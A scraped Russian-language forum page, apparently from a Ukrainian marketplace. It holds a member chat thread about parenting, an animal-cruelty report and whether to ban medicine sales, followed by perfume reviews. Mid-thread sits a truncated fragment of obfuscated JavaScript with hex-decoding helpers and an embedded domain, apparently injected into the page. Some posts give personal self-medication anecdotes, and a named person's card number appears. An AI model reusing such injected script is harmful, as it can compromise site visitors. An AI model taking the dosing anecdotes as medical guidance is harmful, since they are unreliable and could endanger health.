Модератор темы: Nathalie-art

Общаемся между собой на самые разные темы :tancy:

Сообщения не должны нарушать Общие правила сайта/форума.

Дополнение от 18.02.2015

Все спорные моменты сначала решаем со своими покупателями/продавцами в личке или по телефону! И только после детального «разбора полётов» и ОСОЗНАНИЯ масштаба РЕАЛЬНОЙ проблемы выносим её в Беседку! Без оглашения ника оппонента и публикации переписки!!! Оглашать ник и публиковать переписку можно только с согласия вашего оппонента или после согласования с администрацией сайта!

Номер карты для перевода денег на лечение больной собаки: 5168755623878655 - андрусив богдана

-

Читать полностью

Беседка

количество комментариев: 16335

Количество просмотров: 1217610

Данный раздел просматривают: Гостей: 1

Написать комментарии в форуме могут только зарегистрированные пользователи

Ответ для: seacoffee

ну, слово поржать меня, даже как филолога, не пугает))) а любовь эта появилась в 6 лет ( ему 6,5 сейчас). да, смехотерапия существует. но неужели мы смеемся в жизни  только лишь для того, чтобы подлечиться????? зачем от чего-то и для чего-то смеяться???? хотя, нет... для удовольствия, конечно. а от чего -да от того, что мы очень ржачная семья))))))) сорри за сленг)))

п.с. такая смехотерапия не каждый день, а по желанию и настроению, канэшна))))

количество респектов: 6

Ответ для: =TaNuSik=

Очень интересно, а когда вот появилась эта любовь поржать  сорри за сленг, но это ваше слово, перед сном? Можно узнать? И сколько лет ребёнку. Да существует смехотерапия, но всё-таки терапия, тогда от чего????

количество респектов: 1

Ответ длядMikaela

да, интересно) с некоторыми вещами можно  согласиться, над некоторыми задуматься, а с какими-то и поспорить... в некоторых случаях автор предлагает такое, на что трудно решиьтся как родителю... и это, скорее всего, мнение со своей колокольни)))( моей колоколльни) так, например, многие советуют не беситься перед сном, не играть в активные игры и т.д.  а мы вот с ребенком любим поржать непосредственно перед сном,  уже лежа в постеле - после такой психологической разрядки мой малыш сладко засыпает)))) suum cuique говорили древние римляне - каждому свое)))) 

количество респектов: 5

Ответ для: zloy_admin

я не разбираюсь в компьютерных программах и т.д ,и попрошу вас Денис впредь не тыкать носом людей,и привселюдно показывать какие они тупые и не догадались посмотреть что загружают.а если я  и понятия не имею что такое возможно.спасибо за внимание!

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "kremchik.com.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Мда, в таком ключе и правда ну его, от греха...

Так, всем любителям животных, натрапилв на "радостное" известие...В Запорожье завелся кэтхантер - гаденыш живодерствует и выкладывает фото в сеть, вот не пойму только он на фото или другие "херои". Запостила на ФБ, может опознает кто...И ведь по малолетству отделается, а что дальше? Сволочь, блин.

http://m.obozrevatel.com/crime/27094-im-dvizhet-satana-v-zaporozhe-obyavilsya-maloletnij-kethanter.htm

дамы как. администрация ЗАПРИЩАЮ ТОРГОВЛЮ ЛЮБЫМИ лекарственными средствами или добавками  и всему такому!

живём в не простой час неизвестно у кого, что на уме завтра "пролетариат" повинуясь призывам с бигбордов понесут донос на рессурс что здесь торгуют лекарственными средствами без сертификатов или ещё хуже коробочки с таблетками с не понятными надписями, а может это наркотические средства??. и пойдёт разработка и наш ресур будут шерстить и продавца по запросу суда придётся предоставить данные , а кто уж к продавцу придёт домой это уже начальство по УПРАВЛЕНИЮ ОБОРОТОМ НАРКОТИКОВ Илья  Кива выберет из своих многотысячных сотрудников пришедших с АТОпомогите

тем более продавцам не стоит брать как говориться грех на душу у нас нет культуры чтения инструкций даже при установки программного обеспечения , жмут все подрыт не разбредаясь  потом жалуются что не то поустанавливали , а вы хотите чтоб они лекарства употребляли , а не дай Бог что случится по неосведомлённости , кто в тюрьмы пойдет ? там говорят все занято и кормить нечем!

итог все лекарственные и беологические добавки убрать с продаж на нашем сайте! от огреха

количество респектов: 4

Ответ для: may_1185

Можно подумать подобные лекарства у нас не в свободном доступе и по рецепту. )))

Аптек, больше, чем грибов после дождя, всё продают...

количество респектов: 11

Если администрацию сайта это не беспокоит, то почему бы и нет. У проверенных феечек, чего б и не купить. Знаете вот иногда реально пропадают лекарства, то бестолково купленные, то неподошедшие. Сейчас, правда, мы в церковь стали отдавать, они и в АТО, и беженцам  и по детдомам уже сами там разбираются.

Но вот у Мани18 сама смотрела, у меня у малого астма под вопросом, так врач сказала, когда лечение обсуждали, что лучше зарубежные аналоги найти, если есть возможность- менее вредные и без гормонов. Пока вроде тьфу-тьфу, но когда стала думать где искать, сразу объявление вспомнилось.

количество респектов: 9

Ответ для: manya 18

Оксаночка, - я только зА))) лишь бы люди с умом всем пользовались)) а то, когда оно все в свободном доступе и без рецепта....

у меня подружка одна есть, короче начал ее беспокоить какой-то запах по-женски, а вторая наша подружка пролечивалась как раз от хламидиоза... Ну и сидим мы на кухне, а та первая говорит - слушай, а дай мне назначение, которое тебе доктор прописал, мне, наверное , тоже поможет... Я была в шоке!!!!! Как вообще мозгов на это может хватить!!! блин, а реально бы купила и стала б пить, если бы та дала

количество респектов: 2

Я совершенно без зазрений совести удалю всё. ЧТО связано с лекарственными препаратами. Но могу сказать только одно: то, что мне привозят знакомые из Израиля ни в какие сравнения не идёт с нашими препаратами!!! Перешла полностью на обезбаливающее ,,Опталгин" - летом кончалась от периодических болей внизу живота, думала скорую вызывать. Накапала 50 капель опталгина и через 15 минут встала и забыла, что что-то болело. Микроклизьмы от запоров - это вообще невероятная вещь. Летом дочку и племянников спасала. Ввёл ректально и спустя 2-3 минуты уже всё в порядке. Даже Иры - Микаэлы собаку спасали так же. Одна девочка долго искала противоалергические уколы -  у нас в аптеках они под 400грн стоят, эти же ампулы мне люди привозят по 150грн. Одну ношу с собой со шприцем в косметичке. Это мне реально спасло жизнь, когда после очередного обезбаливания у зубного у меня начался олёк носоглотки, в истерике схватила ампулу и доктор тут же сделала укол в руку, а то хвост его знает вообще беседовала ли сейчас с Вами ......

количество респектов: 9

Ответ для: manya 18

привет! да не только ты..) мне-то без разницы.... но, думала, может все-такие не стоит? у нас и так самолечения в стране хватает, а потом народ не знает - откуда последствия берутся?

пусть девочки выскажутся...

Улыбнуло)) и понравилась идея рекламы

https://www.facebook.com/810891302356606/videos/811822295596840/?fref=nf

количество респектов: 4

Это я разместила ,,Ярину", скажите, куда перенести, перенесу или на странице у себя только оставлю.

в теме Сундук стали размещать на продажу Лекарственные средства.... Что скажите? 

Цитата: Mikaela

Почитайте, может тем, у кого детки, будет интересно... http://people.onliner.by/2016/01/22/neformat-3/  

Очень интересная статья. Многие вещи разделяю с коллегой И особенно в практике были случаи И с заикание у детей И энурез И нарушение поведения, особенно самоповреждение, как защита И протест. Да, хотелось что бы был у нас институт воспитания осознанного родительства!!!

Спасибо за интересную ссылку!!!!

количество респектов: 2
Вы просмотрели:

Новые комментарии

Solomiya
17 Января 2017 14:55

Отзыв о Maitre Parfumeur et Gantier Santal Noble

Маршрут 67

Все-таки хорошие ароматы у этого бренда. Здесь сандал - ведущая нота на всем протяжении звучания. Но сандал не маслянистый и томный, а достаточно энергичный и влажный. В старте даже яркий и звонкий, чего обычно за ним не замечала. Хорошо слышны пачули и немного хвойных нот. А вот кофе ко мне пришел только в базе. Привычного мне ладана не услышала, но вот легкая, теплая смолистость в базе присутствует. Я б легко отнесла аромат к унисексам.

margosha14
17 Января 2017 14:41

Отзыв о Amouage Reflection Woman

З проброчки пахне яблуками-огірками-травою. На мені ТІЛЬКИ індолить і більше ні звуку. Таке зі мною вперше. Без затесту - ні-ні.

margosha14
17 Января 2017 14:41

Отзыв о Amouage Reflection Woman

З проброчки пахне яблуками-огірками-травою. На мені ТІЛЬКИ індолить і більше ні звуку. Таке зі мною вперше. Без затесту - ні-ні.

margosha14
17 Января 2017 14:26

Отзыв о Olfactive Studio Lumiere Blanche

Тут дивним чином поєднуюються освіжаюча прохолода анісу і м'яка теплота кардамону. Аромат одночасно гострий спецієвий і молочно мигдальний. Носити дуже приємно. Почуваю себе в прозорій хмаринці. Хоч аромат не голосний, помічала, що колеги-чоловіки поряд зі мною "принюхуються". Не наважилась питати чи подобається. Чоловікові подобається - каже "чай масала з анісом".

Загрузка...
Наверх